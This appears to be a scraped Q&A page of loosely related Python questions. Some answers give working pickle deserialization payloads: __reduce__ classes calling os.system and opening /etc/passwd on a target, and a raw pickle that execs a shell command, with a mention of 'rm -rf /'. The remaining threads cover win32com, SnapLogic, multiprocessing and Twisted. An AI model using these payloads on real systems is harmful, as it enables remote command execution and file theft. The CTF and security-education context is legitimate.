I'm trying to perform a cPickle deserialization exploit for a CTF. I'm working on an exploit for a deserialization vulnerability, trying to generate a Python class that will run a command on a server when deserialized, following this example: https://lincolnloop.com/blog/playing-pickle-security/
import os
import cPickle

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('ls',))

shellcode = cPickle.dumps(Exploit())
print shellcode
The thing is that the server I'm trying to exploit doesn't have the "os" or the "subprocess" modules included, so I'm not able to run shell commands. I'm trying to read local files with objects generated with the following code:
class Exploit(object):
    def __reduce__(self):
        data = open("/etc/passwd", "rb").read()
        return data

shellcode = cPickle.dumps(Exploit())
print shellcode
but when I try to run it to generate the payload, it tries to read my local /etc/passwd file and fails with the error message:
shellcode = cPickle.dumps(Exploit())
cPickle.PicklingError: Can't pickle <__main__.Exploit object at 0x7f14ef4b39d0>: attribute lookup __main__.root:x:0:0:root:/root:/bin/sh (/etc/passwd continues)
When I run the first example, it generates the following pickle successfully (and doesn't try to do an ls on my machine):
cposix
system
p1
(S'ls'
p2
tp3
Rp4
.
So why is it not working with my code?
"Whenever you try to pickle an object, there will be some properties that may not serialize well. For instance, an open file handle In this cases, pickle won't know how to handle the object and will throw an error."
See also: What's the exact usage of __reduce__ in Pickler?
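For context, here is a minimal sketch of how __reduce__ is meant to be used: it must return a tuple of (callable, args), and that callable is invoked on the unpickling side rather than when the payload is generated. The ReadFile class name is illustrative only.

import cPickle

class ReadFile(object):
    def __reduce__(self):
        # Only the callable and its arguments are pickled; open() runs
        # when the payload is unpickled on the target, not here.
        return (open, ('/etc/passwd', 'rb'))

payload = cPickle.dumps(ReadFile())
print payload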
Related
I'm writing a simple email filter to act on incoming Outlook messages on Windows 10, and I want to code it in Python using the win32com library under Anaconda. I also want to avoid using magic numbers for the "Inbox" as I see in other examples, and would rather use the constants that should be defined under win32com.client.constants. But I'm running into simple errors that are surprising:
So, I concocted the following simple code, loosely based upon https://stackoverflow.com/a/65800130/257924 :
import sys
import win32com.client

try:
    outlookApp = win32com.client.Dispatch("Outlook.Application")
except:
    print("ERROR: Unable to load Outlook")
    sys.exit(1)

outlook = outlookApp.GetNamespace("MAPI")
ofContacts = outlook.GetDefaultFolder(win32com.client.constants.olFolderContacts)
print("ofContacts", type(ofContacts))
sys.exit(0)
Running that under an Anaconda-based installer (Anaconda3 2022.10 (Python 3.9.13 64-bit)) on Windows 10 errors out with:
(base) c:\Temp>python testing.py
Traceback (most recent call last):
  File "c:\Temp\testing.py", line 11, in <module>
    ofContacts = outlook.GetDefaultFolder(win32com.client.constants.olFolderContacts)
  File "C:\Users\brentg\Anaconda3\lib\site-packages\win32com\client\__init__.py", line 231, in __getattr__
    raise AttributeError(a)
AttributeError: olFolderContacts
Further debugging indicates that the __dicts__ attribute is referenced by the __init__.py shown in the traceback above. See the excerpt of that class below. For some reason, that __dicts__ is an empty list:
class Constants:
    """A container for generated COM constants."""

    def __init__(self):
        self.__dicts__ = []  # A list of dictionaries

    def __getattr__(self, a):
        for d in self.__dicts__:
            if a in d:
                return d[a]
        raise AttributeError(a)

# And create an instance.
constants = Constants()
What is required to have win32com properly initialize that constants object?
The timestamps on the __init__.py file show 10/10/2021 in case that is relevant.
The short answer is to change:
outlookApp = win32com.client.Dispatch("Outlook.Application")
to
outlookApp = win32com.client.gencache.EnsureDispatch("Outlook.Application")
The longer answer is that win32com can work with COM interfaces in one of two ways: late- and early-binding.
With late-binding, your code knows nothing about the Dispatch interface, i.e. it doesn't know which methods, properties or constants are available. When you call a method on the Dispatch interface, win32com doesn't know whether that method exists or what parameters it takes: it just sends what it is given and hopes for the best!
With early-binding, your code relies on previously-captured information about the Dispatch interface, taken from its Type Library. This information is used to create local Python wrappers for the interface which know all the methods and their parameters. At the same time it populates the Constants dictionary with any constants/enums contained in the Type Library.
win32com has a catch-all win32com.client.Dispatch() function which will try to use early-binding if the local wrapper files are present, otherwise will fall back to using late-binding. My problem with the package is that the caller doesn't always know what they are getting, as in the OP's case.
The alternative win32com.client.gencache.EnsureDispatch() function enforces early-binding and ensures any constants are available. If the local wrapper files are not available, they will be created (you might find them under %LOCALAPPDATA%\Temp\gen_py\xx\CLSID, where xx is the Python version number and CLSID is the GUID of the Type Library). Once these wrappers have been created, the generic win32com.client.Dispatch() will use them.
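Applied to the code in the question, the early-binding version would look roughly like this (a sketch: it is the OP's snippet with only the EnsureDispatch call swapped in and a slightly narrower except clause):

import sys
import win32com.client

try:
    # EnsureDispatch builds the Type Library wrappers if needed, which
    # also populates win32com.client.constants with the Outlook enums.
    outlookApp = win32com.client.gencache.EnsureDispatch("Outlook.Application")
except Exception:
    print("ERROR: Unable to load Outlook")
    sys.exit(1)

outlook = outlookApp.GetNamespace("MAPI")
ofContacts = outlook.GetDefaultFolder(win32com.client.constants.olFolderContacts)
print("ofContacts", type(ofContacts))
sys.exit(0)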
From the Python docs for pickle:
Warning The pickle module is not secure. Only unpickle data you trust.
What would be an example of pickling and then un-pickling data that would do something malicious? I've only ever used pickle to save objects that don't necessarily JSON-encode well (date, decimal, etc.), so I don't have much experience with it or with what it's capable of outside of being a "simpler json" encoder.
What would be an example of something malicious that could be done with it?
Like Chase said, functions can be executed by unpickling. According to this source: https://intoli.com/blog/dangerous-pickles/, pickled objects are actually stored as bytecode instructions which are interpreted on opening (similar to Python itself). By writing pickle bytecode, it's possible to make a pickle "program" to do anything.
Here I made a pickle "program" to run the shell command say "malicious code", but you could run commands like rm -rf / as well.
I saved the following bytecode to a file:
c__builtin__
exec
(Vimport os; os.system('say "malicious code"')
tR.
and then unpickled it with:
import pickle
loadfile = open('malicious', 'rb')
data = pickle.load(loadfile)
I immediately heard some "malicious code".
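Since a pickle is just a small instruction stream, a suspicious payload can also be inspected without executing it. A minimal sketch using the standard pickletools module, reusing the 'malicious' file from above:

import pickletools

# Disassemble the opcodes instead of running them; the GLOBAL and REDUCE
# instructions reveal which callable the payload would invoke.
with open('malicious', 'rb') as f:
    pickletools.dis(f.read())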
I have a simple SQL file that I'd like to read and execute using a Python Script Snap in SnapLogic. I created an expression library file to reference the Redshift account and have included it as a parameter in the pipeline.
I have the code below from another post. Is there a way to reference the pipeline parameter to connect to the Redshift database, read the uploaded SQL file and execute the commands?
fd = open('shared/PythonExecuteTest.sql', 'r')
sqlFile = fd.read()
fd.close()

sqlCommands = sqlFile.split(';')
for command in sqlCommands:
    try:
        c.execute(command)
    except OperationalError, msg:
        print "Command skipped: ", msg
You can access pipeline parameters in scripts using $_.
Let's say, you have a pipeline parameter executionId. Then to access it in the script you can do $_executionId.
Following is a test pipeline.
With the following pipeline parameter.
Following is the test data.
Following is the script
# Import the interface required by the Script snap.
from com.snaplogic.scripting.language import ScriptHook
import java.util

class TransformScript(ScriptHook):
    def __init__(self, input, output, error, log):
        self.input = input
        self.output = output
        self.error = error
        self.log = log

    # The "execute()" method is called once when the pipeline is started
    # and allowed to process its inputs or just send data to its outputs.
    def execute(self):
        self.log.info("Executing Transform script")
        while self.input.hasNext():
            try:
                # Read the next document, wrap it in a map and write out the wrapper
                in_doc = self.input.next()
                wrapper = java.util.HashMap()
                wrapper['output'] = in_doc
                wrapper['output']['executionId'] = $_executionId
                self.output.write(in_doc, wrapper)
            except Exception as e:
                errWrapper = {
                    'errMsg' : str(e.args)
                }
                self.log.error("Error in python script")
                self.error.write(errWrapper)
        self.log.info("Finished executing the Transform script")

# The Script Snap will look for a ScriptHook object in the "hook"
# variable. The snap will then call the hook's "execute" method.
hook = TransformScript(input, output, error, log)
Output:
Here, you can see that the executionId was read from the pipeline parameters.
Note: Accessing pipeline parameters from scripts is a valid scenario, but accessing other external systems from the script is complicated (because you would need to load the required libraries) and not recommended. Use the snaps provided by SnapLogic to access external systems. Also, if you want to use other libraries inside scripts, try sticking to JavaScript instead of Python, because there are a lot of open-source CDNs that you can use in your scripts.
Also, you can't access any configured expression library directly from the script. If you need some logic in the script, you would keep it in the script and not somewhere else. And, there is no point in accessing account names in the script (or mappers) because, even if you know the account name, you can't use the credentials/configurations stored in that account directly; that is handled by SnapLogic. Use the provided snaps and mappers as much as possible.
Update #1
You can't access the account directly. Accounts are managed and used internally by the snaps. You can only create and set accounts through the accounts tab of the relevant snap.
Avoid using script snap as much as possible; especially, if you can do the same thing using normal snaps.
Update #2
The simplest solution to this requirement would be as follows.
1. Read the file using a file reader.
2. Split based on ;.
3. Execute each SQL command using the Generic JDBC Execute Snap.
I would like to use the multiprocess package, for example in this code.
I've tried to call the function create_new_population and distribute the data to 8 processors, but when I do I get a pickle error.
Normally the function would run like this: self.create_new_population(self.pop_size)
I try to distribute the work like this:
f= self.create_new_population
pop = self.pop_size/8
self.current_generation = [pool.apply_async(f, pop) for _ in range(8)]
I get Can't pickle local object 'exhaust.__init__.<locals>.tour_select'
or PermissionError: [WinError 5] Access is denied
I've read this thread carefully and also tried to bypass the error using an approach from Steven Bethard to allow method pickling/unpickling via copyreg:
def _pickle_method(method)
def _unpickle_method(func_name, obj, cls)
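For reference, that copyreg-based recipe looks roughly like the sketch below (assuming Python 3 naming; note it registers a pickler for bound methods, which is a separate issue from pickling locally defined functions such as tour_select):

import copyreg
import types

def _pickle_method(method):
    # Describe a bound method by its name, instance and class so it can
    # be reconstructed on the other side.
    func_name = method.__func__.__name__
    obj = method.__self__
    cls = method.__self__.__class__
    return _unpickle_method, (func_name, obj, cls)

def _unpickle_method(func_name, obj, cls):
    # Walk the MRO to find the function and rebind it to the instance.
    for klass in cls.__mro__:
        if func_name in klass.__dict__:
            return klass.__dict__[func_name].__get__(obj, klass)
    raise AttributeError(func_name)

copyreg.pickle(types.MethodType, _pickle_method, _unpickle_method)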
I also tried to use the pathos package, without any luck.
I know that the code should be called under an if __name__ == '__main__': block, but I would like to know if this can be done with minimal changes to the code.
I'm trying to set up a twisted xmlrpc server, which will accept files from a client, process them, and return a file and result dictionary back.
I've used Python before, but never the Twisted libraries. For my purposes security is a non-issue, and the SSH protocol seems like overkill. It also has problems on the Windows server, since termios is not available.
So all of my research points to XML-RPC being the best way to accomplish this. However, there are two methods of file transfer available: the XML binary data method, or the HTTP request method.
Files can be up to a few hundred megs either way, so which method should I use? Sample code is appreciated, since I could find no documentation for file transfers over XML-RPC with Twisted.
Update:
So it seems that serializing the file with xmlrpclib.Binary does not work for large files, or I'm using it wrong. Test code below:
from twisted.web import xmlrpc, server

class Example(xmlrpc.XMLRPC):
    """
    An example object to be published.
    """

    def xmlrpc_echo(self, x):
        """
        Return all passed args.
        """
        return x

    def xmlrpc_add(self, a, b):
        """
        Return sum of arguments.
        """
        return a + b

    def xmlrpc_fault(self):
        """
        Raise a Fault indicating that the procedure should not be used.
        """
        raise xmlrpc.Fault(123, "The fault procedure is faulty.")

    def xmlrpc_write(self, f, location):
        with open(location, 'wb') as fd:
            fd.write(f.data)

if __name__ == '__main__':
    from twisted.internet import reactor
    r = Example(allowNone=True)
    reactor.listenTCP(7080, server.Site(r))
    reactor.run()
And the client code:
import xmlrpclib

s = xmlrpclib.Server('http://localhost:7080/')
with open('test.pdf', 'rb') as fd:
    f = xmlrpclib.Binary(fd.read())
s.write(f, 'output.pdf')
I get xmlrpclib.Fault: <Fault 8002: "Can't deserialize input: "> when I test this. Is it because the file is a pdf?
XML-RPC is a poor choice for file transfers. XML-RPC requires the file content to be encoded in a way that XML supports. This is expensive in both runtime costs and network resources. Instead, try just POSTing or PUTing the file using plain old HTTP.
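As a rough illustration of that suggestion, here is a minimal sketch of a Twisted web resource that accepts a file over a plain HTTP PUT and writes it to disk; the Upload class, port and output filename are illustrative, not taken from the question:

from twisted.web import resource, server
from twisted.internet import reactor

class Upload(resource.Resource):
    isLeaf = True

    def render_PUT(self, request):
        # request.content is a file-like object containing the raw body,
        # so no XML encoding of the file data is involved.
        with open('output.pdf', 'wb') as fd:
            fd.write(request.content.read())
        return 'stored'

reactor.listenTCP(7080, server.Site(Upload()))
reactor.run()

A quick way to exercise it is something like curl -T test.pdf http://localhost:7080/, or any HTTP client that can stream the request body instead of building one large in-memory XML document.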